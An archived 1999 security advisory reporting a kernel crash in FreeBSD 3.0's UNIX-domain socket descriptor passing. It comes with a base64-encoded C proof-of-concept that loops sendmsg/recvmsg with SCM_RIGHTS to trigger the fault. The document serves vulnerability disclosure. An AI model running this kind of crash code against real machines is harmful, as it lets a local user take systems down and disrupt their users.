KKIS.05051999.003b

From: Lukasz Luzar (lluzarat_private)
Date: Wed May 05 1999 - 02:26:21 PDT

  • Next message: Warner Losh: "Re: FreeBSD 3.1 remote reboot exploit" 

      This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mimeat_private for more info.

--1958937097-2116286281-925896381=:17696
Content-Type: TEXT/PLAIN; charset=US-ASCII

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                          ###  ###  ###  ###  ###
                          ### ###   ### ###   ###
                          ######    ######    ###
                          ### ###   ### ###   ###
                          ###  ###  ###  ###  ###

                              S E C U R I T Y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 KKI Security Team                              Cracow Commercial Internet
 http://www.security.kki.pl                     http://www.kki.pl
 mailto:securityat_private                mailto:biuroat_private

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Report title        : Security problem with sockets in FreeBSD's
                       implementation of UNIX-domain protocol family.
 Problem found by    : Lukasz Luzar (lluzarat_private)
 Report created by   : Robert Pajak (shadowat_private)
                       Lukasz Luzar (lluzarat_private)
 Raport published    : 5th May 1999
 Raport code         : KKIS.05051999.003.b
 Systems affected    : FreeBSD-3.0 and maybe 3.1,
 Archive             : http://www.security.kki.pl/advisories/
 Risk level          : high

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  As you know, "The UNIX-domain protocol family is a collection of protocols
 that provides local interprocess communication through the normal socket
 mechanism. It supports the SOCK_STREAM and SOCK_DGRAM soceket types and uses
 filesystem pathnames for addressing."
 The SOCK_STREAM sockets also supports the communication of UNIX file
 descriptors through the use of functions sendmsg() and recvmsg().
  While testing UNIX-domain protocols, we have found probable bug in
 FreeBSD's implementation of this mechanism.
  When we had run attached example on FreeBSD-3.0 as local user, system
 had crashed imediatelly with error "Supervisor read, page not present"
 in kernel mode.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Look to attached example.

~~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Copyright (c) 1999 KKI Security Team, Poland
 All rights reserved.

 All questions please address to mailto:securityat_private
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


--1958937097-2116286281-925896381=:17696
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="example.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.10.9905051126210.17696at_private>
Content-Description:
Content-Disposition: attachment; filename="example.c"

I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQoj
aW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPHN5cy91bi5oPg0K
I2luY2x1ZGUgPGZjbnRsLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQoNCiNk
ZWZpbmUgUEFUSCAiL3RtcC8xMjMiDQojZGVmaW5lIFBBVEhfVE1QICIvdG1w
LzEyMy50bXAiDQojZGVmaW5lIFNPTUVfRklMRSAiL2V0Yy9wYXNzd2QiDQoN
CnN0cnVjdCBteWNtc2doZHIgew0KCXN0cnVjdCBjbXNnaGRyIGhkcjsNCglp
bnQJZmQ7DQp9Ow0KDQpleHRlcm4gZXJybm87DQoNCnZvaWQgc2VydmVyKCk7
DQp2b2lkIGNsaWVudCgpOw0KDQp2b2lkIG1haW4oKQ0Kew0KCXN3aXRjaCAo
IGZvcmsoKSkgew0KCWNhc2UgLTE6DQoJCXByaW50ZiggImZvcmsgZXJyb3Ig
JWRcbiIsZXJybm8pOw0KCQlicmVhazsNCgljYXNlIDA6DQoJCWZvciAoOzsp
IGNsaWVudCgpOw0KCWRlZmF1bHQ6DQoJCXNlcnZlcigpOw0KCX0NCn0NCg0K
dm9pZCBzZXJ2ZXIoKQ0Kew0KCXN0cnVjdCBzb2NrYWRkcl91biBhZGRyOw0K
CXN0cnVjdCBtc2doZHIgbXltc2doZHI7DQoJc3RydWN0IG15Y21zZ2hkciBh
bmNkYnVmOw0KCWNoYXIgCWRhdGFbIDFdOw0KCWludAlzb2NrZmQsDQoJCWxl
biwNCgkJZmQ7DQoNCglpZiAoIHVubGluayggUEFUSCkgPT0gLTEpDQoJCXBy
aW50ZiggInVubGluayBlcnJvciAlZFxuIixlcnJubyk7DQoNCglpZiAoKCBz
b2NrZmQgPSBzb2NrZXQoIEFGX1VOSVgsU09DS19ER1JBTSwwKSkgPT0gLTEp
DQoJCXByaW50ZiggInNvY2tldCBlcnJvciAlZFxuIixlcnJubyk7DQoNCglz
dHJjcHkoIGFkZHIuc3VuX3BhdGgsUEFUSCk7DQoJYWRkci5zdW5fbGVuID0g
c2l6ZW9mKCBhZGRyLnN1bl9sZW4pICsgc2l6ZW9mKCBhZGRyLnN1bl9mYW1p
bHkpIA0KCQkJKyBzdHJsZW4oIGFkZHIuc3VuX3BhdGgpOyANCglhZGRyLnN1
bl9mYW1pbHkgPSBBRl9VTklYOw0KDQoJaWYgKCBiaW5kKCBzb2NrZmQsKHN0
cnVjdCBzb2NrYWRkciAqKSAmYWRkcixhZGRyLnN1bl9sZW4pID09IC0xKQ0K
CQlwcmludGYoICJiaW5kIGVycm9yICVkXG4iLGVycm5vKTsNCg0KCWZvciAo
OzspIHsNCg0KCQlpZiAoKCBmZCA9IG9wZW4oIFNPTUVfRklMRSxPX1JET05M
WSkpID09IC0xKSANCgkJCXByaW50ZiggIm9wZW4gZmlsZSBlcnJvciAlZFxu
IixlcnJubyk7DQoNCgkJbGVuID0gc2l6ZW9mKCBhZGRyLnN1bl9wYXRoKTsN
Cg0KCQlpZiAoIHJlY3Zmcm9tKCBzb2NrZmQsJmRhdGEsc2l6ZW9mKCBkYXRh
KSwwLA0KCQkJKHN0cnVjdCBzb2NrYWRkciAqKSAmYWRkciwmbGVuKSA9PSAt
MSkgDQoJCQlwcmludGYoICJyZWN2ZnJvbSBlcnJvciAlZFxuIixlcnJubyk7
DQoNCgkJYW5jZGJ1Zi5oZHIuY21zZ19sZW4gPSBzaXplb2YoIGFuY2RidWYp
Ow0KCQlhbmNkYnVmLmhkci5jbXNnX2xldmVsID0gU09MX1NPQ0tFVDsNCgkJ
YW5jZGJ1Zi5oZHIuY21zZ190eXBlID0gU0NNX1JJR0hUUzsNCgkJYW5jZGJ1
Zi5mZCA9IGZkOw0KDQoJCW15bXNnaGRyLm1zZ19uYW1lID0gKGNhZGRyX3Qp
ICZhZGRyOw0KCQlteW1zZ2hkci5tc2dfbmFtZWxlbiA9IGxlbjsNCgkJbXlt
c2doZHIubXNnX2lvdiA9IE5VTEw7DQoJCW15bXNnaGRyLm1zZ19pb3ZsZW4g
PSAwOw0KCQlteW1zZ2hkci5tc2dfY29udHJvbCA9IChjYWRkcl90KSAmYW5j
ZGJ1ZjsNCgkJbXltc2doZHIubXNnX2NvbnRyb2xsZW4gPSBhbmNkYnVmLmhk
ci5jbXNnX2xlbjsNCgkJbXltc2doZHIubXNnX2ZsYWdzID0gMDsNCgkJDQoJ
CWlmICggc2VuZG1zZyggc29ja2ZkLCZteW1zZ2hkciwwKSA9PSAtMSkgDQoJ
CQlwcmludGYoICJzZW5kbXNnIGVycm9yICVkXG4iLGVycm5vKTsNCg0KCQlj
bG9zZSggZmQpOw0KCX0NCn0NCg0Kdm9pZCBjbGllbnQoKQ0Kew0KCXN0cnVj
dCBzb2NrYWRkcl91bglhZGRyX3MsDQoJCQkJYWRkcl9jOw0KCXN0cnVjdCBt
eWNtc2doZHIJYW5jZGJ1ZjsNCglzdHJ1Y3QgbXNnaGRyCQlteW1zZ2hkcjsN
CgljaGFyIAlkYXRhWyAxXTsNCglpbnQJc29ja2ZkLA0KCQlsZW4sDQoJCWZk
Ow0KDQoJaWYgKCggc29ja2ZkID0gc29ja2V0KCBBRl9VTklYLFNPQ0tfREdS
QU0sMCkpID09IC0xKSANCgkJcHJpbnRmKCAic29ja2V0IGVycm9yICVkXG4i
LGVycm5vKTsNCg0KCWlmICggdW5saW5rKCBQQVRIX1RNUCkgPT0gLTEpDQoJ
CXByaW50ZiggInVubGluayBlcnJvciAlZFxuIixlcnJubyk7DQoNCglzdHJj
cHkoIGFkZHJfYy5zdW5fcGF0aCxQQVRIX1RNUCk7DQoJYWRkcl9jLnN1bl9s
ZW4gPSBzaXplb2YoIGFkZHJfYy5zdW5fbGVuKSArIHNpemVvZihhZGRyX2Mu
c3VuX2ZhbWlseSkgDQoJCQkgICsgc3RybGVuKCBhZGRyX2Muc3VuX3BhdGgp
Ow0KCWFkZHJfYy5zdW5fZmFtaWx5ID0gQUZfVU5JWDsNCg0KCXN0cmNweSgg
YWRkcl9zLnN1bl9wYXRoLFBBVEgpOw0KCWFkZHJfcy5zdW5fbGVuID0gc2l6
ZW9mKCBhZGRyX3Muc3VuX2xlbikgKyBzaXplb2YoYWRkcl9zLnN1bl9mYW1p
bHkpDQoJCSAgICAgICAgICAgKyBzdHJsZW4oIGFkZHJfcy5zdW5fcGF0aCk7
DQoJYWRkcl9zLnN1bl9mYW1pbHkgPSBBRl9VTklYOw0KDQoJaWYgKCBiaW5k
KCBzb2NrZmQsKHN0cnVjdCBzb2NrYWRkciopICZhZGRyX2MsYWRkcl9jLnN1
bl9sZW4pID09IC0xKQ0KCQlwcmludGYoICJiaW5kIGVycm9yICVkXG4iLGVy
cm5vKTsNCg0KCWlmICggc2VuZHRvKCBzb2NrZmQsJmRhdGEsc2l6ZW9mKCBk
YXRhKSwwLChzdHJ1Y3Qgc29ja2FkZHIgKikgJmFkZHJfcywNCgkJYWRkcl9z
LnN1bl9sZW4pID09IC0xKSANCgkJcHJpbnRmKCAic2VuZHRvIGVycm9yICVk
XG4iLGVycm5vKTsNCg0KCWxlbiA9IGFkZHJfcy5zdW5fbGVuOw0KDQoJYW5j
ZGJ1Zi5oZHIuY21zZ19sZW4gPSBzaXplb2YoIGFuY2RidWYpOw0KCWFuY2Ri
dWYuaGRyLmNtc2dfbGV2ZWwgPSBTT0xfU09DS0VUOw0KCWFuY2RidWYuaGRy
LmNtc2dfdHlwZSA9IFNDTV9SSUdIVFM7DQoNCglteW1zZ2hkci5tc2dfbmFt
ZSA9IE5VTEw7DQoJbXltc2doZHIubXNnX25hbWVsZW4gPSAwOw0KCW15bXNn
aGRyLm1zZ19pb3YgPSBOVUxMOw0KCW15bXNnaGRyLm1zZ19pb3ZsZW4gPSAw
Ow0KCW15bXNnaGRyLm1zZ19jb250cm9sID0gKGNhZGRyX3QpICZhbmNkYnVm
Ow0KCW15bXNnaGRyLm1zZ19jb250cm9sbGVuID0gYW5jZGJ1Zi5oZHIuY21z
Z19sZW47DQoJbXltc2doZHIubXNnX2ZsYWdzID0gMDsNCg0KCWlmICggcmVj
dm1zZyggc29ja2ZkLCZteW1zZ2hkciwwKSA9PSAtMSkNCgkJcHJpbnRmKCAi
cmVjdm1zZyBlcnJvciAlZFxuIixlcnJubyk7DQoNCglmZCA9IGFuY2RidWYu
ZmQ7DQoJDQoJY2xvc2UoZmQpOw0KCWNsb3NlKCBzb2NrZmQpOw0KfQ0K
--1958937097-2116286281-925896381=:17696--

    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:44:59 PDT